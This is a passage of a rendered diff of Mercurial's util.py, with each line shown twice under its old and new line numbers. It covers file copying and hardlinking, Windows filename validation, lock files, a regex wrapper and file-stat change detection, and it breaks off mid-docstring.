1738 cmd = quotecommand(cmd)
1736 cmd = quotecommand(cmd)
1739 env = shellenviron(environ)
1737 env = shellenviron(environ)
1740 if out is None or isstdout(out):
1738 if out is None or isstdout(out):
1741 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1739 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1742 env=env, cwd=cwd)
1740 env=env, cwd=cwd)
1743 else:
1741 else:
1744 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1742 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1745 env=env, cwd=cwd, stdout=subprocess.PIPE,
1743 env=env, cwd=cwd, stdout=subprocess.PIPE,
1746 stderr=subprocess.STDOUT)
1744 stderr=subprocess.STDOUT)
1747 for line in iter(proc.stdout.readline, ''):
1745 for line in iter(proc.stdout.readline, ''):
1748 out.write(line)
1746 out.write(line)
1749 proc.wait()
1747 proc.wait()
1750 rc = proc.returncode
1748 rc = proc.returncode
1751 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1749 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1752 rc = 0
1750 rc = 0
1753 return rc
1751 return rc
1754
1752
1755 def checksignature(func):
1753 def checksignature(func):
1756 '''wrap a function with code to check for calling errors'''
1754 '''wrap a function with code to check for calling errors'''
1757 def check(*args, **kwargs):
1755 def check(*args, **kwargs):
1758 try:
1756 try:
1759 return func(*args, **kwargs)
1757 return func(*args, **kwargs)
1760 except TypeError:
1758 except TypeError:
1761 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1759 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1762 raise error.SignatureError
1760 raise error.SignatureError
1763 raise
1761 raise
1764
1762
1765 return check
1763 return check
1766
1764
1767 # a whilelist of known filesystems where hardlink works reliably
1765 # a whilelist of known filesystems where hardlink works reliably
1768 _hardlinkfswhitelist = {
1766 _hardlinkfswhitelist = {
1769 'btrfs',
1767 'btrfs',
1770 'ext2',
1768 'ext2',
1771 'ext3',
1769 'ext3',
1772 'ext4',
1770 'ext4',
1773 'hfs',
1771 'hfs',
1774 'jfs',
1772 'jfs',
1775 'NTFS',
1773 'NTFS',
1776 'reiserfs',
1774 'reiserfs',
1777 'tmpfs',
1775 'tmpfs',
1778 'ufs',
1776 'ufs',
1779 'xfs',
1777 'xfs',
1780 'zfs',
1778 'zfs',
1781 }
1779 }
1782
1780
1783 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1781 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1784 '''copy a file, preserving mode and optionally other stat info like
1782 '''copy a file, preserving mode and optionally other stat info like
1785 atime/mtime
1783 atime/mtime
1786
1784
1787 checkambig argument is used with filestat, and is useful only if
1785 checkambig argument is used with filestat, and is useful only if
1788 destination file is guarded by any lock (e.g. repo.lock or
1786 destination file is guarded by any lock (e.g. repo.lock or
1789 repo.wlock).
1787 repo.wlock).
1790
1788
1791 copystat and checkambig should be exclusive.
1789 copystat and checkambig should be exclusive.
1792 '''
1790 '''
1793 assert not (copystat and checkambig)
1791 assert not (copystat and checkambig)
1794 oldstat = None
1792 oldstat = None
1795 if os.path.lexists(dest):
1793 if os.path.lexists(dest):
1796 if checkambig:
1794 if checkambig:
1797 oldstat = checkambig and filestat.frompath(dest)
1795 oldstat = checkambig and filestat.frompath(dest)
1798 unlink(dest)
1796 unlink(dest)
1799 if hardlink:
1797 if hardlink:
1800 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1798 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1801 # unless we are confident that dest is on a whitelisted filesystem.
1799 # unless we are confident that dest is on a whitelisted filesystem.
1802 try:
1800 try:
1803 fstype = getfstype(os.path.dirname(dest))
1801 fstype = getfstype(os.path.dirname(dest))
1804 except OSError:
1802 except OSError:
1805 fstype = None
1803 fstype = None
1806 if fstype not in _hardlinkfswhitelist:
1804 if fstype not in _hardlinkfswhitelist:
1807 hardlink = False
1805 hardlink = False
1808 if hardlink:
1806 if hardlink:
1809 try:
1807 try:
1810 oslink(src, dest)
1808 oslink(src, dest)
1811 return
1809 return
1812 except (IOError, OSError):
1810 except (IOError, OSError):
1813 pass # fall back to normal copy
1811 pass # fall back to normal copy
1814 if os.path.islink(src):
1812 if os.path.islink(src):
1815 os.symlink(os.readlink(src), dest)
1813 os.symlink(os.readlink(src), dest)
1816 # copytime is ignored for symlinks, but in general copytime isn't needed
1814 # copytime is ignored for symlinks, but in general copytime isn't needed
1817 # for them anyway
1815 # for them anyway
1818 else:
1816 else:
1819 try:
1817 try:
1820 shutil.copyfile(src, dest)
1818 shutil.copyfile(src, dest)
1821 if copystat:
1819 if copystat:
1822 # copystat also copies mode
1820 # copystat also copies mode
1823 shutil.copystat(src, dest)
1821 shutil.copystat(src, dest)
1824 else:
1822 else:
1825 shutil.copymode(src, dest)
1823 shutil.copymode(src, dest)
1826 if oldstat and oldstat.stat:
1824 if oldstat and oldstat.stat:
1827 newstat = filestat.frompath(dest)
1825 newstat = filestat.frompath(dest)
1828 if newstat.isambig(oldstat):
1826 if newstat.isambig(oldstat):
1829 # stat of copied file is ambiguous to original one
1827 # stat of copied file is ambiguous to original one
1830 advanced = (
1828 advanced = (
1831 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1829 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1832 os.utime(dest, (advanced, advanced))
1830 os.utime(dest, (advanced, advanced))
1833 except shutil.Error as inst:
1831 except shutil.Error as inst:
1834 raise error.Abort(str(inst))
1832 raise error.Abort(str(inst))
1835
1833
1836 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1834 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1837 """Copy a directory tree using hardlinks if possible."""
1835 """Copy a directory tree using hardlinks if possible."""
1838 num = 0
1836 num = 0
1839
1837
1840 gettopic = lambda: hardlink and _('linking') or _('copying')
1838 gettopic = lambda: hardlink and _('linking') or _('copying')
1841
1839
1842 if os.path.isdir(src):
1840 if os.path.isdir(src):
1843 if hardlink is None:
1841 if hardlink is None:
1844 hardlink = (os.stat(src).st_dev ==
1842 hardlink = (os.stat(src).st_dev ==
1845 os.stat(os.path.dirname(dst)).st_dev)
1843 os.stat(os.path.dirname(dst)).st_dev)
1846 topic = gettopic()
1844 topic = gettopic()
1847 os.mkdir(dst)
1845 os.mkdir(dst)
1848 for name, kind in listdir(src):
1846 for name, kind in listdir(src):
1849 srcname = os.path.join(src, name)
1847 srcname = os.path.join(src, name)
1850 dstname = os.path.join(dst, name)
1848 dstname = os.path.join(dst, name)
1851 def nprog(t, pos):
1849 def nprog(t, pos):
1852 if pos is not None:
1850 if pos is not None:
1853 return progress(t, pos + num)
1851 return progress(t, pos + num)
1854 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1852 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1855 num += n
1853 num += n
1856 else:
1854 else:
1857 if hardlink is None:
1855 if hardlink is None:
1858 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1856 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1859 os.stat(os.path.dirname(dst)).st_dev)
1857 os.stat(os.path.dirname(dst)).st_dev)
1860 topic = gettopic()
1858 topic = gettopic()
1861
1859
1862 if hardlink:
1860 if hardlink:
1863 try:
1861 try:
1864 oslink(src, dst)
1862 oslink(src, dst)
1865 except (IOError, OSError):
1863 except (IOError, OSError):
1866 hardlink = False
1864 hardlink = False
1867 shutil.copy(src, dst)
1865 shutil.copy(src, dst)
1868 else:
1866 else:
1869 shutil.copy(src, dst)
1867 shutil.copy(src, dst)
1870 num += 1
1868 num += 1
1871 progress(topic, num)
1869 progress(topic, num)
1872 progress(topic, None)
1870 progress(topic, None)
1873
1871
1874 return hardlink, num
1872 return hardlink, num
1875
1873
1876 _winreservednames = {
1874 _winreservednames = {
1877 'con', 'prn', 'aux', 'nul',
1875 'con', 'prn', 'aux', 'nul',
1878 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1876 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1879 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1877 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1880 }
1878 }
1881 _winreservedchars = ':*?"<>|'
1879 _winreservedchars = ':*?"<>|'
1882 def checkwinfilename(path):
1880 def checkwinfilename(path):
1883 r'''Check that the base-relative path is a valid filename on Windows.
1881 r'''Check that the base-relative path is a valid filename on Windows.
1884 Returns None if the path is ok, or a UI string describing the problem.
1882 Returns None if the path is ok, or a UI string describing the problem.
1885
1883
1886 >>> checkwinfilename(b"just/a/normal/path")
1884 >>> checkwinfilename(b"just/a/normal/path")
1887 >>> checkwinfilename(b"foo/bar/con.xml")
1885 >>> checkwinfilename(b"foo/bar/con.xml")
1888 "filename contains 'con', which is reserved on Windows"
1886 "filename contains 'con', which is reserved on Windows"
1889 >>> checkwinfilename(b"foo/con.xml/bar")
1887 >>> checkwinfilename(b"foo/con.xml/bar")
1890 "filename contains 'con', which is reserved on Windows"
1888 "filename contains 'con', which is reserved on Windows"
1891 >>> checkwinfilename(b"foo/bar/xml.con")
1889 >>> checkwinfilename(b"foo/bar/xml.con")
1892 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1890 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1893 "filename contains 'AUX', which is reserved on Windows"
1891 "filename contains 'AUX', which is reserved on Windows"
1894 >>> checkwinfilename(b"foo/bar/bla:.txt")
1892 >>> checkwinfilename(b"foo/bar/bla:.txt")
1895 "filename contains ':', which is reserved on Windows"
1893 "filename contains ':', which is reserved on Windows"
1896 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1894 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1897 "filename contains '\\x07', which is invalid on Windows"
1895 "filename contains '\\x07', which is invalid on Windows"
1898 >>> checkwinfilename(b"foo/bar/bla ")
1896 >>> checkwinfilename(b"foo/bar/bla ")
1899 "filename ends with ' ', which is not allowed on Windows"
1897 "filename ends with ' ', which is not allowed on Windows"
1900 >>> checkwinfilename(b"../bar")
1898 >>> checkwinfilename(b"../bar")
1901 >>> checkwinfilename(b"foo\\")
1899 >>> checkwinfilename(b"foo\\")
1902 "filename ends with '\\', which is invalid on Windows"
1900 "filename ends with '\\', which is invalid on Windows"
1903 >>> checkwinfilename(b"foo\\/bar")
1901 >>> checkwinfilename(b"foo\\/bar")
1904 "directory name ends with '\\', which is invalid on Windows"
1902 "directory name ends with '\\', which is invalid on Windows"
1905 '''
1903 '''
1906 if path.endswith('\\'):
1904 if path.endswith('\\'):
1907 return _("filename ends with '\\', which is invalid on Windows")
1905 return _("filename ends with '\\', which is invalid on Windows")
1908 if '\\/' in path:
1906 if '\\/' in path:
1909 return _("directory name ends with '\\', which is invalid on Windows")
1907 return _("directory name ends with '\\', which is invalid on Windows")
1910 for n in path.replace('\\', '/').split('/'):
1908 for n in path.replace('\\', '/').split('/'):
1911 if not n:
1909 if not n:
1912 continue
1910 continue
1913 for c in _filenamebytestr(n):
1911 for c in _filenamebytestr(n):
1914 if c in _winreservedchars:
1912 if c in _winreservedchars:
1915 return _("filename contains '%s', which is reserved "
1913 return _("filename contains '%s', which is reserved "
1916 "on Windows") % c
1914 "on Windows") % c
1917 if ord(c) <= 31:
1915 if ord(c) <= 31:
1918 return _("filename contains '%s', which is invalid "
1916 return _("filename contains '%s', which is invalid "
1919 "on Windows") % stringutil.escapestr(c)
1917 "on Windows") % stringutil.escapestr(c)
1920 base = n.split('.')[0]
1918 base = n.split('.')[0]
1921 if base and base.lower() in _winreservednames:
1919 if base and base.lower() in _winreservednames:
1922 return _("filename contains '%s', which is reserved "
1920 return _("filename contains '%s', which is reserved "
1923 "on Windows") % base
1921 "on Windows") % base
1924 t = n[-1:]
1922 t = n[-1:]
1925 if t in '. ' and n not in '..':
1923 if t in '. ' and n not in '..':
1926 return _("filename ends with '%s', which is not allowed "
1924 return _("filename ends with '%s', which is not allowed "
1927 "on Windows") % t
1925 "on Windows") % t
1928
1926
1929 if pycompat.iswindows:
1927 if pycompat.iswindows:
1930 checkosfilename = checkwinfilename
1928 checkosfilename = checkwinfilename
1931 timer = time.clock
1929 timer = time.clock
1932 else:
1930 else:
1933 checkosfilename = platform.checkosfilename
1931 checkosfilename = platform.checkosfilename
1934 timer = time.time
1932 timer = time.time
1935
1933
1936 if safehasattr(time, "perf_counter"):
1934 if safehasattr(time, "perf_counter"):
1937 timer = time.perf_counter
1935 timer = time.perf_counter
1938
1936
1939 def makelock(info, pathname):
1937 def makelock(info, pathname):
1940 """Create a lock file atomically if possible
1938 """Create a lock file atomically if possible
1941
1939
1942 This may leave a stale lock file if symlink isn't supported and signal
1940 This may leave a stale lock file if symlink isn't supported and signal
1943 interrupt is enabled.
1941 interrupt is enabled.
1944 """
1942 """
1945 try:
1943 try:
1946 return os.symlink(info, pathname)
1944 return os.symlink(info, pathname)
1947 except OSError as why:
1945 except OSError as why:
1948 if why.errno == errno.EEXIST:
1946 if why.errno == errno.EEXIST:
1949 raise
1947 raise
1950 except AttributeError: # no symlink in os
1948 except AttributeError: # no symlink in os
1951 pass
1949 pass
1952
1950
1953 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1951 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1954 ld = os.open(pathname, flags)
1952 ld = os.open(pathname, flags)
1955 os.write(ld, info)
1953 os.write(ld, info)
1956 os.close(ld)
1954 os.close(ld)
1957
1955
1958 def readlock(pathname):
1956 def readlock(pathname):
1959 try:
1957 try:
1960 return os.readlink(pathname)
1958 return os.readlink(pathname)
1961 except OSError as why:
1959 except OSError as why:
1962 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1960 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1963 raise
1961 raise
1964 except AttributeError: # no symlink in os
1962 except AttributeError: # no symlink in os
1965 pass
1963 pass
1966 fp = posixfile(pathname, 'rb')
1964 fp = posixfile(pathname, 'rb')
1967 r = fp.read()
1965 r = fp.read()
1968 fp.close()
1966 fp.close()
1969 return r
1967 return r
1970
1968
1971 def fstat(fp):
1969 def fstat(fp):
1972 '''stat file object that may not have fileno method.'''
1970 '''stat file object that may not have fileno method.'''
1973 try:
1971 try:
1974 return os.fstat(fp.fileno())
1972 return os.fstat(fp.fileno())
1975 except AttributeError:
1973 except AttributeError:
1976 return os.stat(fp.name)
1974 return os.stat(fp.name)
1977
1975
1978 # File system features
1976 # File system features
1979
1977
1980 def fscasesensitive(path):
1978 def fscasesensitive(path):
1981 """
1979 """
1982 Return true if the given path is on a case-sensitive filesystem
1980 Return true if the given path is on a case-sensitive filesystem
1983
1981
1984 Requires a path (like /foo/.hg) ending with a foldable final
1982 Requires a path (like /foo/.hg) ending with a foldable final
1985 directory component.
1983 directory component.
1986 """
1984 """
1987 s1 = os.lstat(path)
1985 s1 = os.lstat(path)
1988 d, b = os.path.split(path)
1986 d, b = os.path.split(path)
1989 b2 = b.upper()
1987 b2 = b.upper()
1990 if b == b2:
1988 if b == b2:
1991 b2 = b.lower()
1989 b2 = b.lower()
1992 if b == b2:
1990 if b == b2:
1993 return True # no evidence against case sensitivity
1991 return True # no evidence against case sensitivity
1994 p2 = os.path.join(d, b2)
1992 p2 = os.path.join(d, b2)
1995 try:
1993 try:
1996 s2 = os.lstat(p2)
1994 s2 = os.lstat(p2)
1997 if s2 == s1:
1995 if s2 == s1:
1998 return False
1996 return False
1999 return True
1997 return True
2000 except OSError:
1998 except OSError:
2001 return True
1999 return True
2002
2000
2003 try:
2001 try:
2004 import re2
2002 import re2
2005 _re2 = None
2003 _re2 = None
2006 except ImportError:
2004 except ImportError:
2007 _re2 = False
2005 _re2 = False
2008
2006
2009 class _re(object):
2007 class _re(object):
2010 def _checkre2(self):
2008 def _checkre2(self):
2011 global _re2
2009 global _re2
2012 try:
2010 try:
2013 # check if match works, see issue3964
2011 # check if match works, see issue3964
2014 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2012 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2015 except ImportError:
2013 except ImportError:
2016 _re2 = False
2014 _re2 = False
2017
2015
2018 def compile(self, pat, flags=0):
2016 def compile(self, pat, flags=0):
2019 '''Compile a regular expression, using re2 if possible
2017 '''Compile a regular expression, using re2 if possible
2020
2018
2021 For best performance, use only re2-compatible regexp features. The
2019 For best performance, use only re2-compatible regexp features. The
2022 only flags from the re module that are re2-compatible are
2020 only flags from the re module that are re2-compatible are
2023 IGNORECASE and MULTILINE.'''
2021 IGNORECASE and MULTILINE.'''
2024 if _re2 is None:
2022 if _re2 is None:
2025 self._checkre2()
2023 self._checkre2()
2026 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2024 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2027 if flags & remod.IGNORECASE:
2025 if flags & remod.IGNORECASE:
2028 pat = '(?i)' + pat
2026 pat = '(?i)' + pat
2029 if flags & remod.MULTILINE:
2027 if flags & remod.MULTILINE:
2030 pat = '(?m)' + pat
2028 pat = '(?m)' + pat
2031 try:
2029 try:
2032 return re2.compile(pat)
2030 return re2.compile(pat)
2033 except re2.error:
2031 except re2.error:
2034 pass
2032 pass
2035 return remod.compile(pat, flags)
2033 return remod.compile(pat, flags)
2036
2034
2037 @propertycache
2035 @propertycache
2038 def escape(self):
2036 def escape(self):
2039 '''Return the version of escape corresponding to self.compile.
2037 '''Return the version of escape corresponding to self.compile.
2040
2038
2041 This is imperfect because whether re2 or re is used for a particular
2039 This is imperfect because whether re2 or re is used for a particular
2042 function depends on the flags, etc, but it's the best we can do.
2040 function depends on the flags, etc, but it's the best we can do.
2043 '''
2041 '''
2044 global _re2
2042 global _re2
2045 if _re2 is None:
2043 if _re2 is None:
2046 self._checkre2()
2044 self._checkre2()
2047 if _re2:
2045 if _re2:
2048 return re2.escape
2046 return re2.escape
2049 else:
2047 else:
2050 return remod.escape
2048 return remod.escape
2051
2049
2052 re = _re()
2050 re = _re()
2053
2051
2054 _fspathcache = {}
2052 _fspathcache = {}
2055 def fspath(name, root):
2053 def fspath(name, root):
2056 '''Get name in the case stored in the filesystem
2054 '''Get name in the case stored in the filesystem
2057
2055
2058 The name should be relative to root, and be normcase-ed for efficiency.
2056 The name should be relative to root, and be normcase-ed for efficiency.
2059
2057
2060 Note that this function is unnecessary, and should not be
2058 Note that this function is unnecessary, and should not be
2061 called, for case-sensitive filesystems (simply because it's expensive).
2059 called, for case-sensitive filesystems (simply because it's expensive).
2062
2060
2063 The root should be normcase-ed, too.
2061 The root should be normcase-ed, too.
2064 '''
2062 '''
2065 def _makefspathcacheentry(dir):
2063 def _makefspathcacheentry(dir):
2066 return dict((normcase(n), n) for n in os.listdir(dir))
2064 return dict((normcase(n), n) for n in os.listdir(dir))
2067
2065
2068 seps = pycompat.ossep
2066 seps = pycompat.ossep
2069 if pycompat.osaltsep:
2067 if pycompat.osaltsep:
2070 seps = seps + pycompat.osaltsep
2068 seps = seps + pycompat.osaltsep
2071 # Protect backslashes. This gets silly very quickly.
2069 # Protect backslashes. This gets silly very quickly.
2072 seps.replace('\\','\\\\')
2070 seps.replace('\\','\\\\')
2073 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2071 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2074 dir = os.path.normpath(root)
2072 dir = os.path.normpath(root)
2075 result = []
2073 result = []
2076 for part, sep in pattern.findall(name):
2074 for part, sep in pattern.findall(name):
2077 if sep:
2075 if sep:
2078 result.append(sep)
2076 result.append(sep)
2079 continue
2077 continue
2080
2078
2081 if dir not in _fspathcache:
2079 if dir not in _fspathcache:
2082 _fspathcache[dir] = _makefspathcacheentry(dir)
2080 _fspathcache[dir] = _makefspathcacheentry(dir)
2083 contents = _fspathcache[dir]
2081 contents = _fspathcache[dir]
2084
2082
2085 found = contents.get(part)
2083 found = contents.get(part)
2086 if not found:
2084 if not found:
2087 # retry "once per directory" per "dirstate.walk" which
2085 # retry "once per directory" per "dirstate.walk" which
2088 # may take place for each patches of "hg qpush", for example
2086 # may take place for each patches of "hg qpush", for example
2089 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2087 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2090 found = contents.get(part)
2088 found = contents.get(part)
2091
2089
2092 result.append(found or part)
2090 result.append(found or part)
2093 dir = os.path.join(dir, part)
2091 dir = os.path.join(dir, part)
2094
2092
2095 return ''.join(result)
2093 return ''.join(result)
2096
2094
2097 def checknlink(testfile):
2095 def checknlink(testfile):
2098 '''check whether hardlink count reporting works properly'''
2096 '''check whether hardlink count reporting works properly'''
2099
2097
2100 # testfile may be open, so we need a separate file for checking to
2098 # testfile may be open, so we need a separate file for checking to
2101 # work around issue2543 (or testfile may get lost on Samba shares)
2099 # work around issue2543 (or testfile may get lost on Samba shares)
2102 f1, f2, fp = None, None, None
2100 f1, f2, fp = None, None, None
2103 try:
2101 try:
2104 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2102 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2105 suffix='1~', dir=os.path.dirname(testfile))
2103 suffix='1~', dir=os.path.dirname(testfile))
2106 os.close(fd)
2104 os.close(fd)
2107 f2 = '%s2~' % f1[:-2]
2105 f2 = '%s2~' % f1[:-2]
2108
2106
2109 oslink(f1, f2)
2107 oslink(f1, f2)
2110 # nlinks() may behave differently for files on Windows shares if
2108 # nlinks() may behave differently for files on Windows shares if
2111 # the file is open.
2109 # the file is open.
2112 fp = posixfile(f2)
2110 fp = posixfile(f2)
2113 return nlinks(f2) > 1
2111 return nlinks(f2) > 1
2114 except OSError:
2112 except OSError:
2115 return False
2113 return False
2116 finally:
2114 finally:
2117 if fp is not None:
2115 if fp is not None:
2118 fp.close()
2116 fp.close()
2119 for f in (f1, f2):
2117 for f in (f1, f2):
2120 try:
2118 try:
2121 if f is not None:
2119 if f is not None:
2122 os.unlink(f)
2120 os.unlink(f)
2123 except OSError:
2121 except OSError:
2124 pass
2122 pass
2125
2123
2126 def endswithsep(path):
2124 def endswithsep(path):
2127 '''Check path ends with os.sep or os.altsep.'''
2125 '''Check path ends with os.sep or os.altsep.'''
2128 return (path.endswith(pycompat.ossep)
2126 return (path.endswith(pycompat.ossep)
2129 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2127 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2130
2128
2131 def splitpath(path):
2129 def splitpath(path):
2132 '''Split path by os.sep.
2130 '''Split path by os.sep.
2133 Note that this function does not use os.altsep because this is
2131 Note that this function does not use os.altsep because this is
2134 an alternative of simple "xxx.split(os.sep)".
2132 an alternative of simple "xxx.split(os.sep)".
2135 It is recommended to use os.path.normpath() before using this
2133 It is recommended to use os.path.normpath() before using this
2136 function if need.'''
2134 function if need.'''
2137 return path.split(pycompat.ossep)
2135 return path.split(pycompat.ossep)
2138
2136
2139 def gui():
2137 def gui():
2140 '''Are we running in a GUI?'''
2138 '''Are we running in a GUI?'''
2141 if pycompat.isdarwin:
2139 if pycompat.isdarwin:
2142 if 'SSH_CONNECTION' in encoding.environ:
2140 if 'SSH_CONNECTION' in encoding.environ:
2143 # handle SSH access to a box where the user is logged in
2141 # handle SSH access to a box where the user is logged in
2144 return False
2142 return False
2145 elif getattr(osutil, 'isgui', None):
2143 elif getattr(osutil, 'isgui', None):
2146 # check if a CoreGraphics session is available
2144 # check if a CoreGraphics session is available
2147 return osutil.isgui()
2145 return osutil.isgui()
2148 else:
2146 else:
2149 # pure build; use a safe default
2147 # pure build; use a safe default
2150 return True
2148 return True
2151 else:
2149 else:
2152 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2150 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2153
2151
2154 def mktempcopy(name, emptyok=False, createmode=None):
2152 def mktempcopy(name, emptyok=False, createmode=None):
2155 """Create a temporary file with the same contents from name
2153 """Create a temporary file with the same contents from name
2156
2154
2157 The permission bits are copied from the original file.
2155 The permission bits are copied from the original file.
2158
2156
2159 If the temporary file is going to be truncated immediately, you
2157 If the temporary file is going to be truncated immediately, you
2160 can use emptyok=True as an optimization.
2158 can use emptyok=True as an optimization.
2161
2159
2162 Returns the name of the temporary file.
2160 Returns the name of the temporary file.
2163 """
2161 """
2164 d, fn = os.path.split(name)
2162 d, fn = os.path.split(name)
2165 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2163 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2166 os.close(fd)
2164 os.close(fd)
2167 # Temporary files are created with mode 0600, which is usually not
2165 # Temporary files are created with mode 0600, which is usually not
2168 # what we want. If the original file already exists, just copy
2166 # what we want. If the original file already exists, just copy
2169 # its mode. Otherwise, manually obey umask.
2167 # its mode. Otherwise, manually obey umask.
2170 copymode(name, temp, createmode)
2168 copymode(name, temp, createmode)
2171 if emptyok:
2169 if emptyok:
2172 return temp
2170 return temp
2173 try:
2171 try:
2174 try:
2172 try:
2175 ifp = posixfile(name, "rb")
2173 ifp = posixfile(name, "rb")
2176 except IOError as inst:
2174 except IOError as inst:
2177 if inst.errno == errno.ENOENT:
2175 if inst.errno == errno.ENOENT:
2178 return temp
2176 return temp
2179 if not getattr(inst, 'filename', None):
2177 if not getattr(inst, 'filename', None):
2180 inst.filename = name
2178 inst.filename = name
2181 raise
2179 raise
2182 ofp = posixfile(temp, "wb")
2180 ofp = posixfile(temp, "wb")
2183 for chunk in filechunkiter(ifp):
2181 for chunk in filechunkiter(ifp):
2184 ofp.write(chunk)
2182 ofp.write(chunk)
2185 ifp.close()
2183 ifp.close()
2186 ofp.close()
2184 ofp.close()
2187 except: # re-raises
2185 except: # re-raises
2188 try:
2186 try:
2189 os.unlink(temp)
2187 os.unlink(temp)
2190 except OSError:
2188 except OSError:
2191 pass
2189 pass
2192 raise
2190 raise
2193 return temp
2191 return temp
2194
2192
2195 class filestat(object):
2193 class filestat(object):
2196 """help to exactly detect change of a file
2194 """help to exactly detect change of a file
2197
2195
2198 'stat' attribute is result of 'os.stat()' if specified 'path'
2196 'stat' attribute is result of 'os.stat()' if specified 'path'
2199 exists. Otherwise, it is None. This can avoid preparative
2197 exists. Otherwise, it is None. This can avoid preparative
2200 'exists()' examination on client side of this class.
2198 'exists()' examination on client side of this class.
2201 """
2199 """
2202 def __init__(self, stat):
2200 def __init__(self, stat):
2203 self.stat = stat
2201 self.stat = stat
2204
2202
2205 @classmethod
2203 @classmethod
2206 def frompath(cls, path):
2204 def frompath(cls, path):
2207 try:
2205 try:
2208 stat = os.stat(path)
2206 stat = os.stat(path)
2209 except OSError as err:
2207 except OSError as err:
2210 if err.errno != errno.ENOENT:
2208 if err.errno != errno.ENOENT:
2211 raise
2209 raise
2212 stat = None
2210 stat = None
2213 return cls(stat)
2211 return cls(stat)
2214
2212
2215 @classmethod
2213 @classmethod
2216 def fromfp(cls, fp):
2214 def fromfp(cls, fp):
2217 stat = os.fstat(fp.fileno())
2215 stat = os.fstat(fp.fileno())
2218 return cls(stat)
2216 return cls(stat)
2219
2217
2220 __hash__ = object.__hash__
2218 __hash__ = object.__hash__
2221
2219
2222 def __eq__(self, old):
2220 def __eq__(self, old):
2223 try:
2221 try:
2224 # if ambiguity between stat of new and old file is
2222 # if ambiguity between stat of new and old file is
2225 # avoided, comparison of size, ctime and mtime is enough
2223 # avoided, comparison of size, ctime and mtime is enough
2226 # to exactly detect change of a file regardless of platform
2224 # to exactly detect change of a file regardless of platform
2227 return (self.stat.st_size == old.stat.st_size and
2225 return (self.stat.st_size == old.stat.st_size and
2228 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2226 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2229 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2227 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2230 except AttributeError:
2228 except AttributeError:
2231 pass
2229 pass
2232 try:
2230 try:
2233 return self.stat is None and old.stat is None
2231 return self.stat is None and old.stat is None
2234 except AttributeError:
2232 except AttributeError:
2235 return False
2233 return False
2236
2234
2237 def isambig(self, old):
2235 def isambig(self, old):
2238 """Examine whether new (= self) stat is ambiguous against old one
2236 """Examine whether new (= self) stat is ambiguous against old one
2239
2237
2240 "S[N]" below means stat of a file at N-th change:
2238 "S[N]" below means stat of a file at N-th change:
2241
2239
2242 - S[n-1].ctime < S[n].ctime: can detect change of a file
2240 - S[n-1].ctime < S[n].ctime: can detect change of a file
2243 - S[n-1].ctime == S[n].ctime
2241 - S[n-1].ctime == S[n].ctime
2244 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2242 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2245 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2243 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2246 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2244 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2247 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2245 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2248
2246
2249 Case (*2) above means that a file was changed twice or more at
